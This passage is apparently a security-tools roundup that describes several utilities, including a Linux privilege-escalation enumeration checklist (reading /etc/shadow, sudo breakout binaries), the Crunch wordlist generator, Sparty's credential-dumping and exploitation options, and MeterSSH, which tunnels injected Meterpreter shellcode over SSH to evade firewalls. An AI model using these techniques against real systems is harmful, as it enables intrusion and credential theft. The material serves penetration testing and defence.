    • Attempt to read restricted files i.e. /etc/shadow
    • List current users history files (i.e .bash_history, .nano_history etc.)
  • Privileged access:
    • Determine if /etc/sudoers is accessible
    • Determine if the current user has Sudo access without a password
    • Are known ‘good’ breakout binaries available via Sudo (i.e. nmap, vim etc.)
    • Is root’s home directory accessible
    • List permissions for /home/
  • Environmental:
    • Display current $PATH
  • Jobs/Tasks:
    • List all cron jobs
    • Locate all world-writable cron jobs
    • Locate cron jobs owned by other users of the system
  • Services:
    • List network connections (TCP & UDP)
    • List running processes
    • Lookup and list process binaries and associated permissions
    • List inetd.conf/xined.conf contents and associated binary file permissions
    • List init.d binary permissions
  • Version Information (of the following):
    • Sudo
    • MYSQL
    • Postgres
    • Apache
  • Default/Weak Credentials:
    • Checks for default/weak Postgres accounts
    • Checks for default root/root access to local MYSQL services
  • Searches:
    • Locate all SUID/GUID files
    • Locate all world-writable SUID/GUID files
    • Locate all SUID/GUID files owned by root
    • Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc)
    • List all world-writable files
    • Find/list all accessible *.plan files and display contents
    • Find/list all accesible *.rhosts files and display contents
    • Show NFS server details
    • Locate *.conf and *.log files containing keyword supplied at script runtime
    • List all *.conf files located in /etc
    • Locate mail
Some of the above commands are privileged/and or the related task may be nonexistent and will therefore most likely fail. The user shouldn’t be alerted to failed results, just the output from successful commands should be displayed.


Crunch - Password Cracking Wordlist Generator


Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations.
Features
  • crunch generates wordlists in both combination and permutation ways
  • it can breakup output by number of lines or file size
  • now has resume support
  • pattern now supports number and symbols
  • pattern now supports upper and lower case characters separately
  • adds a status report when generating multiple files
  • new -l option for literal support of @,%^
  • new -d option to limit duplicate characters see man file for details
  • now has unicode support

Basic Usage
./crunch [min length] [max length] [character set] [options]

./crunch 3 3 ABC\!\@\%
Crunch will now generate the following amount of data: 864 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 216
AAA
AAB
AAC
AA!
AA@
AA%
ABA
...


Detekt - scans your Windows computer for traces of known surveillance spyware


Detekt is a free tool that scans your Windows computer for traces of FinFisher and Hacking Team RCS, commercial surveillance spyware that has been identified to be also used to target and monitor human rights defenders and journalists around the world.

In recent years we have witnessed a huge growth in the adoption and trade in communication surveillance technologies. Such spyware provides the ability to read personal emails, listen-in skype conversations or even remotely turn on a computers camera and microphone without its owner knowing about it.

Some of this software is widely available on the Internet, while some more sophisticated alternatives are made and sold by private companies based in industrialized countries to state law enforcement and intelligence agencies in countries across the world.

There is little to no regulation currently in place to safeguard against these technologies being sold or used by repressive governments or others who are likely to use them for serious human rights violations and abuses.


Lynis 1.6.4 - Security auditing tool for Unix/Linux systems


Lynis is an open source security auditing tool. Primary goal is to help users with auditing and hardening of Unix and Linux based systems. The software is very flexible and runs on almost every Unix based system (including Mac). Even the installation of the software itself is optional!

How it works

Lynis will perform hundreds of individual tests to determine the security state of the system. Many of these tests are also part of common security guidelines and standards. Examples include searching for installed software and determine possible configuration flaws. Lynis goes further and does also test individual software components, checks related configuration files and measures performance. After these tests, a scan report will be displayed with all discovered findings.

Typical use cases for Lynis:
  • Security auditing
  • Vulnerability scanning
  • System hardening

Requirements:
Privileged or non-privileged

Changelog:
New:
- Boot loader detection for AIX [BOOT-5102]
- Detection of getcap and lsvg binary
- Added filesystem_ext to report
- Detect rootsh
Changes:
- Hide errors when RPM database is faulty and show suggestion instead [PKGS-7308]
- Allow OpenBSD to gather information on listening network ports [NETW-3012]
- Don't trigger warning for Shellshock when doing segfault test [SHLL-6290]
- Do not run Apache test on OpenBSD and strip control chars [HTTP-6624]
- Extended AIDE test with configuration validation test [FIND-4314]
- Improved Shellshock test regarding non-Linux support [SHLL-6290]
- Added support for gathering volume groups on AIX [FILE-6311]
- Properly parse PAM lines and add them to report [AUTH-9264]
- Support for boot loader detection on OpenBSD [BOOT-5159]
- Added uptime detection for OpenBSD systems [BOOT-5202]
- Support for volume groups on AIX [FILE-6312]
- Redirect errors when searching for readlink binary


DAMM - Differential Analysis of Malware in Memory

An open source memory analysis tool built on top of Volatility. It is meant as a proving ground for interesting new techniques to be made available to the community. These techniques are an attempt to speed up the investigation process through data reduction and codifying some expert knowledge.

Features
  • ~30 Volatility plugins combined into ~20 DAMM plugins (e.g., pslist, psxview and other elements are combined into a 'processes' plugin)
  • Can run multiple plugins in one invocation
  • The option to store plugin results in SQLite databases for preservation or for "cached" analysis
  • A filtering/type system that allows easily filtering on attributes like pids to see all information related to some process and exact or partial matching for strings, etc.
  • The ability to show the differences between two databases of results for the same or similar machines and manipulate from the cmdline how the differencing operates
  • The ability to warn on certain types of suspicious behavior
  • Output for terminal, tsv or grepable

Usage
NOTE: Most DAMM output looks better piped through 'less -S' (upper 'S') as in: 
#python damm.py <some DAMM functionality> | less -S (for default output format)
python damm.py -h
usage: damm.py [-h] [-d DIR] [-p PLUGIN [PLUGIN ...]] [-f FILE] [-k KDBG]
[--db DB] [--profile PROFILE] [--debug] [--info] [--tsv]
[--grepable] [--filter FILTER] [--filtertype FILTERTYPE]
[--diff BASELINE] [-u FIELD [FIELD ...]] [--warnings] [-q]

DAMM v1.0 Beta

optional arguments:
-h, --help show this help message and exit
-d DIR Path to additional plugin directory
-p PLUGIN [PLUGIN ...]
Plugin(s) to run. For a list of options use --info
-f FILE Memory image file to run plugin on
-k KDBG KDBG address for the images (in hex)
--db DB SQLite db file, for efficient input/output
--profile PROFILE Volatility profile for the images (e.g. WinXPSP2x86)
--debug Print debugging statements
--info Print available volatility profiles, plugins
--tsv Print screen formatted output.
--grepable Print in grepable text format
--filter FILTER Filter results on name:value pair, e.g., pid:42
--filtertype FILTERTYPE
Filter match type; either "exact" or "partial",
defaults to partial
--diff BASELINE Diff the imageFile|db with this db file as a baseline
-u FIELD [FIELD ...] Use the specified fields to determine uniqueness of
memobjs when diffing
--warnings Look for suspicious objects.
-q Query the supplied db (via --db).

Supported plugins
See #python damm.py --info

apihooks callbacks connections devicetree dlls evtlogs handles idt injections messagehooks mftentries modules mutants privileges processes services sids timers


Sparty - MS Sharepoint and Frontpage Auditing Tool


Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.

Functionalities and capabilities !

1. Sharepoint and Frontpage Version Detection!
2. Dumping Password from Exposed Configuration Files!
3. Exposed Sharepoint/Frontpage Services Scan!
4. Exposed Directory Check!
5. Installed File and Access Rights Check!
6. RPC Service Querying!
7. File Enumeration!
8. File Uploading Check!

Requirements

1. This version uses following libraries:
        import urllib2
        import re
        import os, sys
        import optparse
        import httplib

2. Python 2.6 is required.

Usage: sparty.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit

Frontpage::
-f FRONTPAGE, --frontpage=FRONTPAGE
-- to check access permissions
on frontpage standard files in vti or bin directory!

Sharepoint::
-s SHAREPOINT, --sharepoint=SHAREPOINT
-- to check
access permissions on sharepoint standard files in
forms or layouts or catalog directory!

Mandatory::
-u URL, --url=URL target url to scan with proper structure

Information Gathering and Exploit::
-v FINGERPRINT, --http_fingerprint=FINGERPRINT
--
fingerprint sharepoint or frontpage based on HTTP
headers!
-d DUMP, --dump=DUMP
-- dump credentials from
default sharepoint and frontpage files (configuration
errors and exposed entries)!
-l DIRECTORY, --list=DIRECTORY
-- check directory listing
and permissions!
-e EXPLOIT, --exploit=EXPLOIT
EXPLOIT = -- exploit vulnerable installations by
checking RPC querying and file uploading
-i SERVICES, --services=SERVICES
SERVICES = -- checking exposed
services !
services !

Authentication [devalias.net]:
-a AUTHENTICATION, --auth-type=AUTHENTICATION
AUTHENTICATION = -- Authenticate with NTLM
user/pass !

General::
-x EXAMPLES, --examples=EXAMPLES
running usage examples !


WhoisCL - Get WHOIS records from command-line


WhoisCL is a simple command-line utility that allows you to easily get information about a registered domain. It automatically connect to the right WHOIS server, according to the top-level domain name, and retrieve the WHOIS record of the domain.

It supports both generic domains and country code domains.

System Requirements

  • Windows operating system: Windows 98/ME/2000/XP/2003/2008/7/8.
  • Internet connection.
  • On a firewall, you should allow outgoing connections to port 43. 

Usage

WhoisCL [-r] [-n] [-socks4] [-socks5] Domain
[-r] If you specify this option, the top remark lines of the WHOIS record are automatically removed.
[-n] If you specify this option, WhoisCL will get the correct WHOIS server from xx.whois-servers.net, instead of using the internal WHOIS servers list.
[-socks4] Specifies SOCKS4 proxy to use, in IPAddress:Port format
[-socks5] Specifies SOCKS5 proxy to use, in IPAddress:Port format
Domain Domain name.

Examples:
WhoisCL microsoft.com
WhoisCL -r google.com
WhoisCL -n w3c.org
WhoisCL -socks4 192.168.0.55:1080 nirsoft.net
WhoisCL -socks5 192.168.10.55:9980 facebook.com


MeterSSH - Meterpreter over SSH


As penetration testers, it’s crucial to identify what types of attacks are detected and what’s not. After running into a recent penetration test with a next generation firewall, most analysis has shifted away from the endpoints and more towards network analysis. While there needs to be a mixture of both, MeterSSH demonstrates how easy it is to circumvent a lot of these signature based “next generation” product lines.

MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker machine through an SSH tunnel and all self contained into one single Python file. Python can easily be converted to an executable using pyinstaller or py2exe.

MeterSSH is easy – simply edit the meterssh.py file and add your SSH server IP, port, username, and password and run the script. It will spawn meterpreter through memory injection (in this case a windows/meterpreter/bind_tcp) and bind to port 8021. Paramiko (python SSH module) is used to tunnel meterpreter over 8021 and back to the attacker and all communications tucked within that SSH tunnel.

Features

  1. Meterpreter over SSH
  2. Ability to configure different IP's, addresses, etc. without the need to ever change the shellcode.
  3. Monitor for the SSH connection and automatically spawn the shell



Parrot Security OS - Friendly OS designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting, Privacy/Anonimity and Cryptography


Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting, privacy/anonimity and cryptography. Based on Debian and developed by Frozenbox network.

Who can use it

Parrot is designed for everyone, from the Pro pentester to the newbie, because it provides the most professional tools combined in a easy to use, fast and lightweight pentesting environment, and it can be used also for an everyday use.


Features:

System Specs
  • Debian-based system
  • Custom hardened linux 3.16 kernel
  • Rolling release upgrade line
  • MATE desktop environment
  • Lightdm Dislpay Manager
  • Custom themes, icons and wallpapers
System Requirements
  • CPU: x86 compatible processor with at least 800Mhz – non-pae processors require a custom kernel (available via repositories)
  • ARCH: i386 (x86-32bit) and amd64 (x86-64bit) supported – armel and armhf coming soon
  • RAM: At least 256Mb (i386) / 320Mb (amd64) – 512Mb suggested
  • GPU: No graphic acceleration required – propertary drivers installable via repositories
  • HDD: 8Gb required – 3.8Gb used
  • BOOT: Legacy bios (preferred) or UEFI (experimental)
Pentesting
  • Fresh & lightweight pentesting environment
  • Easy to use automation tools for beginners
  • Must-have professional tools for Pro Pentesters
  • Custom tools developed by our team
  • External tools developed by our community
  • Only a selected set of tools is preinstalled out of the box
  • Thousands of other tools are available in our repositories
Cloud
  • Parrot Server Edition
  • Parrot Cloud Controller
  • Custom installation script for Debian VPS
  • Cloud Pentesting concept for file hosting and remote distributed computing
Digital Forensic
  • “Stealth” option at boot for no partitions or swap mounting
  • Most famous Digital Forensic tools and frameworks out of the box
Cryptography
  • Custom Anti Forensic tools
  • Custom interfaces for GPG
  • Custom interfaces for cryptsetup
  • NUKE slots for cryptsetup LUKS disks
  • Encrypted system installation
Anonymity
  • AnonSurf
  • Whole-system anonymization
  • DNS requests anonymization
  • “Change Identity” function for AnonSurf
  • BleachBit system cleaner
  • NoScript plugin
  • UserAgentOverrider plugin
Programming
  • FALCON Programming Language (1.0)
  • System editor tuned for programming
  • Lots of preinstalled compilers/interpreters/debuggers
  • Reverse Engineering Tools
  • Programming Template Files
  • Preinstalled most-used libs
Cryptocurrency
  • Cryptocurrency-friendly environment
  • Custom compiled wallets available in our software center
  • MultiBit
  • Bitcoin-qt
  • Litecoin-qt
  • Feathercoin-qt
  • BitLira-qt
  • Dogecoin-qt
  • Zetacoin-qt
  • Other wallets will be available as soon as possible